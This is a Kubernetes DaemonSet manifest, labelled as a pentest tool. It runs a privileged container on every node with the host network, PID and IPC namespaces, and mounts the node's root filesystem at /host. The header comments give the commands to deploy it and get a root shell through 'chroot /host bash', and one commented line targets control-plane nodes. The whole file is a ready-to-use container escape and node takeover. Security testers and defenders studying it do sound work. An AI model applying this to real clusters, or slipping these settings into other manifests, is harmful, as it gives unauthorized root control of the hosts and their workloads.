###########################################################
## Deploy:   kubectl apply -f everything-allowed-exec-deamonset.yaml
## Find Pod: kubectl get pods | grep everything-allowed-exec-deamonset 
## Access:   kubectl exec -it everything-allowed-exec-deamonset-ID -- chroot /host bash
## Remove:   kubectl delete deamonset everything-allowed-exec-deamonset
###########################################################

apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: everything-allowed-exec-deamonset
  labels:
    app: pentest
    type: deamonset
spec:
  selector:
    matchLabels:
      app: pentest
      type: deamonset
  template:
    metadata:
      labels:
        app: pentest
        type: deamonset
    spec:
      hostNetwork: true
      hostPID: true
      hostIPC: true
      containers:
      - name: everything-allowed-exec-deamonset
        image: ubuntu
        securityContext:
          privileged: true
        volumeMounts:
        - mountPath: /host
          name: noderoot
        command: [ "/bin/sh", "-c", "--" ]
        args: [ "while true; do sleep 30; done;" ]
      #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
      volumes:
      - name: noderoot
        hostPath:
          path: /
      